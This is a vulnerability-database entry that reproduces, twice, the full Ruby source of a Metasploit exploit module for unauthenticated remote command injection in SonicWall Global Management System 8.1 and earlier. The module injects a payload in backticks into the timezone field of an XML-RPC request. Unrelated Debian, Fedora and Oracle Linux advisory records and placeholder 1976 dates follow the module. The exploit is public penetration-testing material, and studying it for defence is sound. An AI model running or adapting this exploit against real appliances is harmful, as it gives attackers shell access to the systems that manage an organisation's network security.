SonicWall Global Management System XMLRPC set_time_zone Unauth RCE
1976-01-01T00:00:00
ID MSF:EXPLOIT/UNIX/SONICWALL/SONICWALL_XMLRPC_RCE Type metasploit Reporter Rapid7 Modified 1976-01-01T00:00:00
Description
This module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 (Build 8110.1197) and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire network security environment.' These vulnerable versions (8.1 Build 8110.1197 and below) do not prevent unauthenticated, external entities from making XML-RPC requests to port 21009 of the virtual app. After the XML-RPC call is made, a shell script is called like so: 'timeSetup.sh --tz="command injection here"' --usentp="blah"'.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE",
'Description' => %q{
This module exploits a vulnerability in SonicWall Global
Management System Virtual Appliance versions 8.1 (Build 8110.1197)
and below. This virtual appliance can be downloaded from
http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a
holistic way to manage your entire network security environment.'
These vulnerable versions (8.1 Build 8110.1197 and below) do not
prevent unauthenticated, external entities from making XML-RPC
requests to port 21009 of the virtual app. After the XML-RPC call
is made, a shell script is called like so:
'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.
},
'License' => MSF_LICENSE,
'Author' => [ 'Michael Flanders', #MSF Module
'kernelsmith' #Advisor
],
'References' => [
['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],
['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']
],
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [
[ 'SonicWall Global Management System Virtual Appliance', {} ],
],
'Payload' => {
# Can't use ampersand, Java's XML-RPC parser will complain and return an error
'BadChars' => "\x26",
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic bash telnet'
}
},
'DisclosureDate' => '2016-07-22',
'DefaultTarget' => 0))
register_options(
[
OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.
Defaults to 80/443 depending on SSL.'])
])
end
def check
if datastore['WEB_SERVER_PORT']
port_number = datastore['WEB_SERVER_PORT']
else
port_number = datastore['SSL'] ? '443' : '80'
end
handler = datastore['SSL'] ? 'https' : 'http'
res = request_url("#{handler}://#{rhost}:#{port_number}")
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/
return CheckCode::Safe
end
version = Gem::Version.new $1.to_s
unless version <= Gem::Version.new('8.1')
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, "The target is not vulnerable."
end
print_status "The target appears to be vulnerable, continuing exploit..."
send_xml
end
def send_xml
xml_body = <<~HERESTRING
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>set_time_config</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>timezone</name>
<value>
<string>"`#{payload.encoded}`"</string>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
HERESTRING
res = send_request_raw({
'method' => 'POST',
'uri' => '/',
'data' => xml_body,
'ctype' => 'text/xml; charset=UTF-8'
})
unless res && res.body.include?("success")
print_error("Error sending XML to #{rhost}:#{rport}")
end
end
end
{"id": "MSF:EXPLOIT/UNIX/SONICWALL/SONICWALL_XMLRPC_RCE", "type": "metasploit", "bulletinFamily": "exploit", "title": "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE", "description": "This module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 (Build 8110.1197) and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire network security environment.' These vulnerable versions (8.1 Build 8110.1197 and below) do not prevent unauthenticated, external entities from making XML-RPC requests to port 21009 of the virtual app. After the XML-RPC call is made, a shell script is called like so: 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://www.digitaldefense.com/digital-defense/vrt-discoveries/", "https://slides.com/kernelsmith/bsidesaustin2018/#/"], "cvelist": [], "lastseen": "2020-10-14T21:02:34", "viewCount": 69, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2020-10-14T21:02:34", "rev": 2}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0603", "RHSA-2021:0558", "RHSA-2021:0557", "RHSA-2021:0548", "RHSA-2021:0600", "RHSA-2021:0436", "RHSA-2021:0568", "RHSA-2021:0549", "RHSA-2021:0599", "RHSA-2021:0551"]}, {"type": "fedora", "idList": ["FEDORA:D876630B21C8", "FEDORA:1DBB230B131F", "FEDORA:4E16930B130B", "FEDORA:F300430AD103", "FEDORA:3BF713093F7B", "FEDORA:28A5130A3C09"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-9058"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2561-1:72FAB"]}], "modified": "2020-10-14T21:02:34", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"SonicWall Global Management System XMLRPC set_time_zone Unauth RCE\",\n 'Description' => %q{\n This module exploits a vulnerability in SonicWall Global\n Management System Virtual Appliance versions 8.1 (Build 8110.1197)\n and below. This virtual appliance can be downloaded from\n http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a\n holistic way to manage your entire network security environment.'\n\n These vulnerable versions (8.1 Build 8110.1197 and below) do not\n prevent unauthenticated, external entities from making XML-RPC\n requests to port 21009 of the virtual app. After the XML-RPC call\n is made, a shell script is called like so:\n 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Michael Flanders', #MSF Module\n 'kernelsmith' #Advisor\n ],\n 'References' => [\n ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],\n ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']\n ],\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [\n [ 'SonicWall Global Management System Virtual Appliance', {} ],\n ],\n 'Payload' => {\n # Can't use ampersand, Java's XML-RPC parser will complain and return an error\n 'BadChars' => \"\\x26\",\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic bash telnet'\n }\n },\n 'DisclosureDate' => '2016-07-22',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.\n Defaults to 80/443 depending on SSL.'])\n ])\n end\n\n def check\n if datastore['WEB_SERVER_PORT']\n port_number = datastore['WEB_SERVER_PORT']\n else\n port_number = datastore['SSL'] ? '443' : '80'\n end\n\n handler = datastore['SSL'] ? 'https' : 'http'\n\n res = request_url(\"#{handler}://#{rhost}:#{port_number}\")\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Unknown\n end\n\n unless res.code == 200 && res.body =~ /<TITLE>.+v(\\d\\.\\d)/\n return CheckCode::Safe\n end\n\n version = Gem::Version.new $1.to_s\n\n unless version <= Gem::Version.new('8.1')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n fail_with Failure::NotVulnerable, \"The target is not vulnerable.\"\n end\n\n print_status \"The target appears to be vulnerable, continuing exploit...\"\n send_xml\n end\n\n def send_xml\n xml_body = <<~HERESTRING\n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <methodCall>\n <methodName>set_time_config</methodName>\n <params>\n <param>\n <value>\n <struct>\n <member>\n <name>timezone</name>\n <value>\n <string>\"`#{payload.encoded}`\"</string>\n </value>\n </member>\n </struct>\n </value>\n </param>\n </params>\n </methodCall>\n HERESTRING\n\n res = send_request_raw({\n 'method' => 'POST',\n 'uri' => '/',\n 'data' => xml_body,\n 'ctype' => 'text/xml; charset=UTF-8'\n })\n\n unless res && res.body.include?(\"success\")\n print_error(\"Error sending XML to #{rhost}:#{rport}\")\n end\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"debian": [{"lastseen": "2021-02-26T13:31:30", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21239", "CVE-2017-1000433"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2577-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Abhijith PA\nFebruary 26, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : python-pysaml2\nVersion : 3.0.0-5+deb9u2\nCVE ID : CVE-2017-1000433 CVE-2021-21239\nDebian Bug : 886423 CVE-2021-21239\n\nSeveral issues have been found in python-pysaml2, a pure python \nimplementation of SAML Version 2 Standard.\n\nCVE-2017-1000433\n\n pysaml2 accept any password when run with python optimizations \n enabled. This allows attackers to log in as any user without \n knowing their password.\n\nCVE-2021-21239\n\n pysaml2 has an improper verification of cryptographic signature\n vulnerability. Users of pysaml2 that use the default\n CryptoBackendXmlSec1 backend and need to verify signed SAML\n documents are impacted. PySAML2 does not ensure that a signed\n SAML document is correctly signed. The default\n CryptoBackendXmlSec1 backend is using the xmlsec1 binary to\n verify the signature of signed SAML documents, but by default\n xmlsec1 accepts any type of key found within the given document.\n xmlsec1 needs to be configured explicitly to only use only _x509\n certificates_ for the verification process of the SAML document signature.\n\nFor Debian 9 stretch, these problems have been fixed in version\n3.0.0-5+deb9u2.\n\nWe recommend that you upgrade your python-pysaml2 packages.\n\nFor the detailed security status of python-pysaml2 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/python-pysaml2\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-02-26T05:06:18", "published": "2021-02-26T05:06:18", "id": "DEBIAN:DLA-2577-1:3F007", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202102/msg00038.html", "title": "[SECURITY] [DLA 2577-1] python-pysaml2 security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-26T01:24:33", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21309"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2576-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Chris Lamb\nFebruary 25, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : redis\nVersion : 3:3.2.6-3+deb9u4\nCVE ID : CVE-2021-21309\nDebian Bug : #983446\n\nIt was discovered that there were a number of integer overflow issues\nin Redis, a persistent "NoSQL"-style key-value database. It is\ncurrently believed that the issues only affect 32-bit based systems.\n\nFor Debian 9 "Stretch", this problem has been fixed in version\n3:3.2.6-3+deb9u4.\n\nWe recommend that you upgrade your redis packages.\n\nFor the detailed security status of redis please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/redis\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-02-25T17:40:59", "published": "2021-02-25T17:40:59", "id": "DEBIAN:DLA-2576-1:05943", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202102/msg00037.html", "title": "[SECURITY] [DLA 2576-1] redis security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": [], "description": "The libpq package provides the essential shared library for any PostgreSQL client program or interface. You will need to install this package to use any other PostgreSQL package or any clients that need to connect to a PostgreSQL server. ", "modified": "2021-02-26T01:10:06", "published": "2021-02-26T01:10:06", "id": "FEDORA:A99C730CC0D3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: libpq-12.6-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14349", "CVE-2020-14350", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced Object-Relational database management system (DBM S). The base postgresql package contains the client programs that you'll need to access a PostgreSQL DBMS server, as well as HTML documentation for the whole system. These client programs can be located on the same machine as the PostgreSQL server, or on a remote machine that accesses a PostgreSQL server over a network connection. The PostgreSQL server can be found in the postgresql-server sub-package. ", "modified": "2021-02-26T01:10:06", "published": "2021-02-26T01:10:06", "id": "FEDORA:E148330CC0ED", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: postgresql-12.6-1.fc33", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-26933", "CVE-2021-26934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2021-02-26T01:10:01", "published": "2021-02-26T01:10:01", "id": "FEDORA:362E230CAEE6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: xen-4.14.1-5.fc33", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "Command line utility to inspect images and repositories directly on Docker registries without the need to pull them ", "modified": "2021-02-26T01:09:46", "published": "2021-02-26T01:09:46", "id": "FEDORA:6F355304C5CD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: skopeo-1.2.2-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "podman (Pod Manager) is a fully featured container engine that is a simple daemonless tool. podman provides a Docker-CLI comparable command line that eases the transition from other container engines and allows the management of pods, containers and images. Simply put: alias docker=3Dpodman. Most podman commands can be run as a regular user, without requiring additional privileges. podman uses Buildah(1) internally to create container images. Both tools share image (not container) storage, hence each can use or manipulate images (but not containers) created by the other. Manage Pods, Containers and Container Images podman Simple management tool for pods, containers and images ", "modified": "2021-02-26T01:09:46", "published": "2021-02-26T01:09:46", "id": "FEDORA:578F330CA03E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: podman-3.0.1-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "This package contains common configuration files and documentation for cont ainer tools ecosystem, such as Podman, Buildah and Skopeo. It is required because the most of configuration files and docs come from p rojects which are vendored into Podman, Buildah, Skopeo, etc. but they are not pack aged separately. ", "modified": "2021-02-26T01:09:46", "published": "2021-02-26T01:09:46", "id": "FEDORA:4044C30CB118", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: containers-common-1-4.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "The CNI (Container Network Interface) project consists of a specification and libraries for writing plugins to configure network interfaces in Linux containers, along with a number of supported plugins. CNI concerns itself only with network connectivity of containers and removing allocated resourc es when the container is deleted. ", "modified": "2021-02-26T01:09:46", "published": "2021-02-26T01:09:46", "id": "FEDORA:28FE430CB116", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: containernetworking-plugins-0.9.1-2.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "The buildah package provides a command line tool which can be used to * create a working container from scratch or * create a working container from an image as a starting point * mount/umount a working container's root file system for manipulation * save container's root file system layer to create a new image * delete a working container or an image ", "modified": "2021-02-26T01:09:45", "published": "2021-02-26T01:09:45", "id": "FEDORA:9BD7D30CAEE8", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: buildah-1.19.6-2.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-26933", "CVE-2021-26934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2021-02-26T01:09:42", "published": "2021-02-26T01:09:42", "id": "FEDORA:469AC30CA872", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: xen-4.13.2-7.fc32", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27135"], "description": "The xterm program is a terminal emulator for the X Window System. It provides DEC VT102 and Tektronix 4014 compatible terminals for programs that can't use the window system directly. ", "modified": "2021-02-26T01:09:41", "published": "2021-02-26T01:09:41", "id": "FEDORA:727393060988", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: xterm-366-1.fc33", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2021-02-26T03:33:12", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23969", "CVE-2021-23978", "CVE-2021-23973", "CVE-2021-23968"], "description": "[78.8.0-1.0.1]\n- Remove upstream references [Orabug: 30143292]\n- Update distribution for Oracle Linux [Orabug: 30143292]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n[78.8.0-1]\n- Update to 78.8.0 build2\n[78.7.1-1]\n- Update to 78.7.1\n[78.7.0-3]\n- Fixing install prefix for the homepage", "edition": 2, "modified": "2021-02-26T00:00:00", "published": "2021-02-26T00:00:00", "id": "ELSA-2021-0656", "href": "http://linux.oracle.com/errata/ELSA-2021-0656.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T07:36:48", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23969", "CVE-2021-23978", "CVE-2021-23973", "CVE-2021-23968"], "description": "[78.8.0-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[78.8.0-1]\n- Update to 78.8.0 build1", "edition": 2, "modified": "2021-02-26T00:00:00", "published": "2021-02-26T00:00:00", "id": "ELSA-2021-0657", "href": "http://linux.oracle.com/errata/ELSA-2021-0657.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T03:33:55", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23969", "CVE-2021-23978", "CVE-2021-23973", "CVE-2021-23968"], "description": "[78.8.0-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[78.8.0-1]\n- Update to 78.8.0 build1", "edition": 2, "modified": "2021-02-26T00:00:00", "published": "2021-02-26T00:00:00", "id": "ELSA-2021-0661", "href": "http://linux.oracle.com/errata/ELSA-2021-0661.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T07:33:46", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23969", "CVE-2021-23978", "CVE-2021-23973", "CVE-2021-23968"], "description": "[78.8.0-1.0.1]\n- Removed Upstream references\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n[78.8.0-1]\n- Update to 78.8.0 build2\n[78.7.1-1]\n- Update to 78.7.1\n[78.7.0-3]\n- Fixing install prefix for the homepage", "edition": 2, "modified": "2021-02-26T00:00:00", "published": "2021-02-26T00:00:00", "id": "ELSA-2021-0655", "href": "http://linux.oracle.com/errata/ELSA-2021-0655.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 0.0, "vector": "NONE"}}]}
